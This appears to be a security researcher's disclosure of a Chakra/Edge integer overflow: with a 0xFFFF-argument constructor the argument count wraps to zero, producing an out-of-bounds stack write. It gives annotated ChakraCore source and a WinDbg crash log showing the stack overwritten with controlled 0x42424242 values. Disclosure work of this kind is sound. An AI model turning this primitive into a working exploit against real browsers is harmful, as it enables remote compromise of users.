<!-- Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team There is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra! This issue can be reproduced steadly in uptodate Edge in Win10 WIP. //ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo) { Js::ArgSlot argCount = pnode->sxCall.argCount; //pnode->sxCall.argCount=0xFFFF argCount++; // include "this" //overflow!!!! argCount==0 BOOL fSideEffectArgs = FALSE; unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs); Assert(argCount == tmpCount); if (argCount != (Js::ArgSlot)argCount) { Js::Throw::OutOfMemory(); } byteCodeGenerator->StartStatement(pnode); // Start call, allocate out param space funcInfo->StartRecordingOutArgs(argCount); // Assign the call target operand(s), putting them into expression temps if necessary to protect // them from side-effects. if (fSideEffectArgs) { SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo); } if (pnode->sxCall.pnodeTarget->nop == knopSuper) { EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator); } Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true); if (pnode->sxCall.pnodeArgs == nullptr) { funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget); Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)) ? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject; Assert(argCount == 1); Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op); byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount); byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, argCount, callSiteId); } else { byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount); uint32 actualArgCount = 0; if (IsCallOfConstants(pnode)) { funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget); actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount); } else { Js::OpCode op; if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget))) { op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray; } else { op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject; } Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op); Js::AuxArray<uint32> *spreadIndices = nullptr; actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister, false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices); funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget); if (pnode->sxCall.spreadArgCount > 0) { Assert(spreadIndices != nullptr); uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32); uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc; byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, (uint16)actualArgCount, Js::CallIExtended_SpreadArgs, spreadIndices, spreadIndicesSize, callSiteId); } else { byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location, (uint16)actualArgCount, callSiteId); } } Assert(argCount == actualArgCount); } // End call, pop param space funcInfo->EndRecordingOutArgs(argCount); return; } //ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue) { Assert(m_outParams + outRegisterID < m_outSp); m_outParams[outRegisterID] = aValue; //OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only } //ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs) { #ifdef ENABLE_DEBUG_CONFIG_OPTIONS // Support for simulating partially initialized interpreter stack frame. InterpreterThunkStackCountTracker tracker; if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) && CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount()) { switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType)) { case 0: DebugBreak(); break; case 1: Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError); break; default: DebugBreak(); } } #endif ScriptContext* functionScriptContext = function->GetScriptContext(); ThreadContext * threadContext = functionScriptContext->GetThreadContext(); Assert(!threadContext->IsDisableImplicitException()); functionScriptContext->VerifyAlive(!function->IsExternal()); Assert(threadContext->IsScriptActive()); Assert(threadContext->IsInScript()); FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody(); #ifdef ENABLE_DEBUG_CONFIG_OPTIONS if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch { if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode()) { Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode } else { Throw::FatalInternalError(); } } #endif if (executeFunction->GetInterpretedCount() == 0) { executeFunction->TraceInterpreterExecutionMode(); } class AutoRestore { private: ThreadContext *const threadContext; const uint8 savedLoopDepth; public: AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction) : threadContext(threadContext), savedLoopDepth(threadContext->LoopDepth()) { if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction()) { executeFunction->SetWasCalledFromLoop(); } } ~AutoRestore() { threadContext->SetLoopDepth(savedLoopDepth); } } autoRestore(threadContext, executeFunction); #if ENABLE_PROFILE_INFO DynamicProfileInfo * dynamicProfileInfo = nullptr; const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter || (executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction)); if (doProfile) { #if !DYNAMIC_INTERPRETER_THUNK executeFunction->EnsureDynamicProfileInfo(); #endif dynamicProfileInfo = executeFunction->GetDynamicProfileInfo(); threadContext->ClearImplicitCallFlags(); } #else const bool doProfile = false; #endif executeFunction->IncreaseInterpretedCount(); #ifdef BGJIT_STATS functionScriptContext->interpretedCount++; functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount()); #endif AssertMsg(!executeFunction->IsDeferredParseFunction(), "Non-intrinsic functions must provide byte-code to execute"); executeFunction->BeginExecution(); bool fReleaseAlloc = false; InterpreterStackFrame* newInstance = nullptr; Var* allocation = nullptr; if (!isAsmJs && executeFunction->IsCoroutine()) { // If the FunctionBody is a generator then this call is being made by one of the three // generator resuming methods: next(), throw(), or return(). They all pass the generator // object as the first of two arguments. The real user arguments are obtained from the // generator object. The second argument is the ResumeYieldData which is only needed // when resuming a generator and so it only used here if a frame already exists on the // generator object. AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer"); JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]); newInstance = generator->GetFrame(); if (newInstance != nullptr) { ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]); newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData); // The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so // give the InterpreterStackFrame a legit enough stack address to make this comparison work. newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator); } else { // // Allocate a new InterpreterStackFrame instance on the recycler heap. // It will live with the JavascriptGenerator object. // Arguments generatorArgs = generator->GetArguments(); InterpreterStackFrame::Setup setup(function, generatorArgs); size_t varAllocCount = setup.GetAllocationVarCount(); size_t varSizeInBytes = varAllocCount * sizeof(Var); DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr; allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var); AnalysisAssert(allocation); #if DBG // Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var); AnalysisAssert(invalidVar); memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject)); newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar); #else newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr); #endif newInstance->m_reader.Create(executeFunction); generator->SetFrame(newInstance, varSizeInBytes); } } else { InterpreterStackFrame::Setup setup(function, args); size_t varAllocCount = setup.GetAllocationVarCount(); size_t varSizeInBytes = varAllocCount * sizeof(Var); // // Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack. // DWORD_PTR stackAddr; // If the locals area exceeds a certain limit, allocate it from a private arena rather than // this frame. The current limit is based on an old assert on the number of locals we would allow here. if (varAllocCount > InterpreterStackFrame::LocalsThreshold) { ArenaAllocator *tmpAlloc = nullptr; fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc); allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes); stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step) } else { PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes); allocation = (Var*)_alloca(varSizeInBytes); #if DBG memset(allocation, 0xFE, varSizeInBytes); #endif stackAddr = reinterpret_cast<DWORD_PTR>(allocation); } /* * If the function has any loop headers, we allocate an array for the loop headers wrappers, and * reference the wrappers in the array. We then push the pointer to the array onto the stack itself. * We do this so that while the function is being interpreted, we don't want the jitted loop * bodies to be collected, even if the loop body isn't being executed. The loop body will * get collected when the function has been JITted, and when the function exits the interpreter. * The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but * it's cheaper to just copy them all into the recycler array rather than just the ones that * have been jitted. */ Var loopHeaderArray = nullptr; if (executeFunction->GetHasAllocatedLoopHeaders()) { // Loop header array is recycler allocated, so we push it on the stack // When we scan the stack, we'll recognize it as a recycler allocated // object, and mark it's contents and keep the individual loop header // wrappers alive loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr(); } #if DBG Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject)); memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject)); newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar); #else newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr); #endif newInstance->m_reader.Create(executeFunction); } // // Execute the function's byte-code, returning the return-value: // - Mark that the function is current executing and may not be modified. // #if ENABLE_TTD TTD::TTDExceptionFramePopper exceptionFramePopper; if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext)) { bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock); threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally); exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function); } #endif Var aReturn = nullptr; { if (!isAsmJs && executeFunction->IsInDebugMode()) { #if DYNAMIC_INTERPRETER_THUNK PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress); aReturn = newInstance->DebugProcess(); #else aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress()); #endif } else { #if DYNAMIC_INTERPRETER_THUNK PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress); aReturn = newInstance->Process(); #else aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress()); #endif } } executeFunction->EndExecution(); #if ENABLE_TTD if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext)) { exceptionFramePopper.PopInfo(); threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn); } #endif if (fReleaseAlloc) { functionScriptContext->ReleaseInterpreterArena(); } #if ENABLE_PROFILE_INFO if (doProfile) { dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags()); } #endif if (isAsmJs) { return newInstance; } return aReturn; } Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64 Copyright (c) Microsoft Corporation. All rights reserved. *** wait with pending attach Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols Executable search path is: ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\Windows\SYSTEM32\ntdll.dll ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\Windows\System32\KERNEL32.DLL ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\Windows\System32\KERNELBASE.dll ModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\Windows\SYSTEM32\apphelp.dll ModLoad: 00007ffe`a0ee0000 00007ffe`a11d9000 C:\Windows\System32\combase.dll ModLoad: 00007ffe`9e7e0000 00007ffe`9e8d6000 C:\Windows\System32\ucrtbase.dll ModLoad: 00007ffe`a0d00000 00007ffe`a0e25000 C:\Windows\System32\RPCRT4.dll ModLoad: 00007ffe`9ebc0000 00007ffe`9ec2a000 C:\Windows\System32\bcryptPrimitives.dll ModLoad: 00007ffe`a0c50000 00007ffe`a0ced000 C:\Windows\System32\msvcrt.dll ModLoad: 00007ffe`98900000 00007ffe`98960000 C:\Windows\SYSTEM32\wincorlib.DLL ModLoad: 00007ffe`a1de0000 00007ffe`a1ea0000 C:\Windows\System32\OLEAUT32.dll ModLoad: 00007ffe`9ea70000 00007ffe`9eb0a000 C:\Windows\System32\msvcp_win.dll ModLoad: 00007ffe`9e330000 00007ffe`9e341000 C:\Windows\System32\kernel.appcore.dll ModLoad: 00007ffe`7d930000 00007ffe`7dcf4000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\EdgeContent.dll ModLoad: 00007ffe`9ece0000 00007ffe`9f3d2000 C:\Windows\System32\Windows.Storage.dll ModLoad: 00007ffe`a0b90000 00007ffe`a0c31000 C:\Windows\System32\advapi32.dll ModLoad: 00007ffe`9f400000 00007ffe`9f459000 C:\Windows\System32\sechost.dll ModLoad: 00007ffe`96080000 00007ffe`96306000 C:\Windows\SYSTEM32\iertutil.dll ModLoad: 00007ffe`a13b0000 00007ffe`a1401000 C:\Windows\System32\shlwapi.dll ModLoad: 00007ffe`a0e30000 00007ffe`a0eda000 C:\Windows\System32\shcore.dll ModLoad: 00007ffe`9f460000 00007ffe`9f487000 C:\Windows\System32\GDI32.dll ModLoad: 00007ffe`9e8e0000 00007ffe`9ea69000 C:\Windows\System32\gdi32full.dll ModLoad: 00007ffe`a1c90000 00007ffe`a1dda000 C:\Windows\System32\USER32.dll ModLoad: 00007ffe`9f3e0000 00007ffe`9f3fe000 C:\Windows\System32\win32u.dll ModLoad: 00007ffe`9e370000 00007ffe`9e3bc000 C:\Windows\System32\powrprof.dll ModLoad: 00007ffe`9e310000 00007ffe`9e325000 C:\Windows\System32\profapi.dll ModLoad: 00007ffe`9e210000 00007ffe`9e239000 C:\Windows\SYSTEM32\USERENV.dll ModLoad: 00007ffe`8d040000 00007ffe`8d066000 C:\Windows\SYSTEM32\clipc.dll ModLoad: 00007ffe`9d610000 00007ffe`9d641000 C:\Windows\SYSTEM32\ntmarta.dll ModLoad: 00007ffe`9dd60000 00007ffe`9dd77000 C:\Windows\SYSTEM32\cryptsp.dll ModLoad: 00007ffe`9d9a0000 00007ffe`9da44000 C:\Windows\SYSTEM32\DNSAPI.dll ModLoad: 00007ffe`a18b0000 00007ffe`a191c000 C:\Windows\System32\WS2_32.dll ModLoad: 00007ffe`a0b20000 00007ffe`a0b28000 C:\Windows\System32\NSI.dll ModLoad: 00007ffe`a0a40000 00007ffe`a0a6d000 C:\Windows\System32\IMM32.DLL ModLoad: 00007ffe`9d960000 00007ffe`9d997000 C:\Windows\SYSTEM32\IPHLPAPI.DLL ModLoad: 00007ffe`9ccc0000 00007ffe`9ce30000 C:\Windows\SYSTEM32\twinapi.appcore.dll ModLoad: 00007ffe`9e1e0000 00007ffe`9e205000 C:\Windows\SYSTEM32\bcrypt.dll ModLoad: 00007ffe`9d440000 00007ffe`9d461000 C:\Windows\SYSTEM32\profext.dll ModLoad: 00007ffe`8c940000 00007ffe`8c9b4000 C:\Windows\SYSTEM32\msiso.dll ModLoad: 00007ffe`983e0000 00007ffe`98402000 C:\Windows\SYSTEM32\EShims.dll ModLoad: 00007ffe`90b10000 00007ffe`90b2b000 C:\Windows\SYSTEM32\MPR.dll ModLoad: 00007ffe`a1920000 00007ffe`a1a65000 C:\Windows\System32\ole32.dll ModLoad: 00007ffe`9cab0000 00007ffe`9cb45000 C:\Windows\system32\uxtheme.dll ModLoad: 00007ffe`8b6f0000 00007ffe`8b791000 C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll ModLoad: 00007ffe`81fa0000 00007ffe`83651000 C:\Windows\SYSTEM32\edgehtml.dll ModLoad: 00007ffe`9a690000 00007ffe`9a7c9000 C:\Windows\SYSTEM32\wintypes.dll ModLoad: 00007ffe`915c0000 00007ffe`915ff000 C:\Windows\SYSTEM32\MLANG.dll ModLoad: 00007ffe`80f50000 00007ffe`8173a000 C:\Windows\SYSTEM32\chakra.dll ModLoad: 00007ffe`9afe0000 00007ffe`9b056000 C:\Windows\SYSTEM32\policymanager.dll ModLoad: 00007ffe`9af20000 00007ffe`9afaf000 C:\Windows\SYSTEM32\msvcp110_win.dll ModLoad: 00007ffe`9b2d0000 00007ffe`9b466000 C:\Windows\SYSTEM32\PROPSYS.dll ModLoad: 00007ffe`88e90000 00007ffe`88f5b000 C:\Windows\System32\ieproxy.dll ModLoad: 00007ffe`98590000 00007ffe`98696000 C:\Windows\System32\Windows.UI.dll ModLoad: 00007ffe`98500000 00007ffe`98582000 C:\Windows\SYSTEM32\TextInputFramework.dll ModLoad: 00007ffe`99ad0000 00007ffe`99da2000 C:\Windows\SYSTEM32\CoreUIComponents.dll ModLoad: 00007ffe`9c1d0000 00007ffe`9c2b3000 C:\Windows\SYSTEM32\CoreMessaging.dll ModLoad: 00007ffe`9ae40000 00007ffe`9ae55000 C:\Windows\SYSTEM32\usermgrcli.dll ModLoad: 00007ffe`98f20000 00007ffe`99451000 C:\Windows\System32\OneCoreUAPCommonProxyStub.dll ModLoad: 00007ffe`9b470000 00007ffe`9b49a000 C:\Windows\SYSTEM32\dwmapi.dll ModLoad: 00007ffe`9f490000 00007ffe`a08c7000 C:\Windows\System32\shell32.dll ModLoad: 00007ffe`9ec30000 00007ffe`9ec79000 C:\Windows\System32\cfgmgr32.dll ModLoad: 00007ffe`a08d0000 00007ffe`a0a36000 C:\Windows\System32\msctf.dll ModLoad: 00007ffe`98700000 00007ffe`98802000 C:\Windows\SYSTEM32\mrmcorer.dll ModLoad: 00007ffe`8d070000 00007ffe`8d39e000 C:\Windows\SYSTEM32\WININET.dll ModLoad: 00007ffe`9e240000 00007ffe`9e270000 C:\Windows\SYSTEM32\SspiCli.dll ModLoad: 00007ffe`98860000 00007ffe`988c9000 C:\Windows\SYSTEM32\Bcp47Langs.dll ModLoad: 00007ffe`8a7c0000 00007ffe`8a7d0000 C:\Windows\SYSTEM32\tokenbinding.dll ModLoad: 00007ffe`8d800000 00007ffe`8d81b000 C:\Windows\SYSTEM32\ondemandconnroutehelper.dll ModLoad: 00007ffe`963d0000 00007ffe`964a7000 C:\Windows\SYSTEM32\winhttp.dll ModLoad: 00007ffe`9dbc0000 00007ffe`9dc1c000 C:\Windows\system32\mswsock.dll ModLoad: 00007ffe`9a290000 00007ffe`9a29b000 C:\Windows\SYSTEM32\WINNSI.DLL ModLoad: 00007ffe`957f0000 00007ffe`959b8000 C:\Windows\SYSTEM32\urlmon.dll ModLoad: 00007ffe`9dd80000 00007ffe`9dd8b000 C:\Windows\SYSTEM32\CRYPTBASE.DLL ModLoad: 00007ffe`8ca20000 00007ffe`8ca3a000 C:\Windows\System32\Windows.Shell.ServiceHostBuilder.dll ModLoad: 00007ffe`7fed0000 00007ffe`8005a000 C:\Windows\SYSTEM32\ieapfltr.dll ModLoad: 00007ffe`999d0000 00007ffe`999ed000 C:\Windows\System32\rmclient.dll ModLoad: 00007ffe`89aa0000 00007ffe`89ab8000 C:\Windows\System32\UiaManager.dll ModLoad: 00007ffe`8a860000 00007ffe`8a8a7000 C:\Windows\system32\dataexchange.dll ModLoad: 00007ffe`9c2c0000 00007ffe`9c3e2000 C:\Windows\SYSTEM32\dcomp.dll ModLoad: 00007ffe`9b940000 00007ffe`9bc1f000 C:\Windows\SYSTEM32\d3d11.dll ModLoad: 00007ffe`9d180000 00007ffe`9d224000 C:\Windows\SYSTEM32\dxgi.dll ModLoad: 00007ffe`8bb90000 00007ffe`8bc12000 C:\Windows\system32\twinapi.dll ModLoad: 00007ffe`84db0000 00007ffe`84e2a000 C:\Windows\SYSTEM32\windows.ui.core.textinput.dll ModLoad: 00007ffe`81c30000 00007ffe`81c58000 C:\Windows\SYSTEM32\srpapi.dll ModLoad: 00007ffe`9e3c0000 00007ffe`9e589000 C:\Windows\System32\CRYPT32.dll ModLoad: 00007ffe`9e350000 00007ffe`9e361000 C:\Windows\System32\MSASN1.dll ModLoad: 00007ffe`846e0000 00007ffe`8473a000 C:\Windows\System32\Windows.Graphics.dll ModLoad: 00007ffe`8cf00000 00007ffe`8cf5d000 C:\Windows\SYSTEM32\ninput.dll ModLoad: 00007ffe`9bc20000 00007ffe`9c1c4000 C:\Windows\SYSTEM32\d2d1.dll ModLoad: 00007ffe`943a0000 00007ffe`94660000 C:\Windows\SYSTEM32\DWrite.dll ModLoad: 00007ffe`81910000 00007ffe`8191f000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll ModLoad: 00007ffe`99510000 00007ffe`99552000 C:\Windows\SYSTEM32\vm3dum64.dll ModLoad: 00007ffe`994a0000 00007ffe`99507000 C:\Windows\SYSTEM32\D3D10Level9.dll ModLoad: 00007ffe`8b4b0000 00007ffe`8b51b000 C:\Windows\System32\oleacc.dll ModLoad: 00007ffe`81bf0000 00007ffe`81c00000 C:\Windows\system32\msimtf.dll ModLoad: 00007ffe`940f0000 00007ffe`94178000 C:\Windows\system32\directmanipulation.dll ModLoad: 00007ffe`98170000 00007ffe`98184000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll ModLoad: 00007ffe`81bb0000 00007ffe`81be8000 C:\Windows\System32\smartscreenps.dll ModLoad: 00007ffe`94210000 00007ffe`94398000 C:\Windows\SYSTEM32\windows.globalization.dll ModLoad: 00007ffe`8b520000 00007ffe`8b6e5000 C:\Windows\System32\uiautomationcore.dll (1590.5d8): Break instruction exception - code 80000003 (first chance) ntdll!DbgBreakPoint: 00007ffe`a1f48d70 cc int 3 0:035> g onecoreuap\inetcore\urlmon\zones\zoneidentifier.cxx(359)\urlmon.dll!00007FFE958108C0: (caller: 00007FFE9580F77D) ReturnHr(2) tid(b70) 80070002 œµÕ≥’“≤ªµΩ÷∏∂®µƒŒƒº˛°£ (1590.b70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 0:016> r rax=0001000042424242 rbx=000002aa98205cbb rcx=000000d8b83f9e98 rdx=0000000000000c2d rsi=0000000000000000 rdi=000002aa98200025 rip=00007ffe8133ba8d rsp=000000d8b83f9bd0 rbp=000000d8b83f9c00 r8=000000d8b83f9d20 r9=000002aa8688fe00 r10=000002aa86879760 r11=000000d8b83f9978 r12=0000000000000000 r13=000002aa8312a270 r14=0000000000000000 r15=000002aa98205cc2 iopl=0 nv up ei pl nz ac pe nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010212 chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d: 00007ffe`8133ba8d 488904d1 mov qword ptr [rcx+rdx*8],rax ds:000000d8`b8400000=???????????????? 0:016> dq ecx 000000d8`b83f9e98 00000000`00000030 000002aa`86879760 000000d8`b83f9ea8 00010000`42424242 00010000`42424242 000000d8`b83f9eb8 00010000`42424242 00010000`42424242 000000d8`b83f9ec8 00010000`42424242 00010000`42424242 000000d8`b83f9ed8 00010000`42424242 00010000`42424242 000000d8`b83f9ee8 00010000`42424242 00010000`42424242 000000d8`b83f9ef8 00010000`42424242 00010000`42424242 000000d8`b83f9f08 00010000`42424242 00010000`42424242 0:016> dq [ecx+edx*8] 000000d8`b8400000 ????????`???????? ????????`???????? 000000d8`b8400010 ????????`???????? ????????`???????? 000000d8`b8400020 ????????`???????? ????????`???????? 000000d8`b8400030 ????????`???????? ????????`???????? 000000d8`b8400040 ????????`???????? ????????`???????? 000000d8`b8400050 ????????`???????? ????????`???????? 000000d8`b8400060 ????????`???????? ????????`???????? 000000d8`b8400070 ????????`???????? ????????`???????? 0:016> !address 000000d8`b8400000 Usage: Allocation Base: 000000d8`b8400000 Base Address: 000000d8`b8400000 End Address: 000000d8`b84fc000 Region Size: 00000000`000fc000 Type: 00020000 MEM_PRIVATE State: 00002000 MEM_RESERVE Protect: 00000000 More info: ~17k 0:016> !address ecx Usage: Stack Allocation Base: 000000d8`b7a00000 Base Address: 000000d8`b83f4000 End Address: 000000d8`b8400000 Region Size: 00000000`0000c000 Type: 00020000 MEM_PRIVATE State: 00001000 MEM_COMMIT Protect: 00000004 PAGE_READWRITE More info: ~16k 0:016> kb RetAddr : Args to Child : Call Site 00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d 00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5 00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242 00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 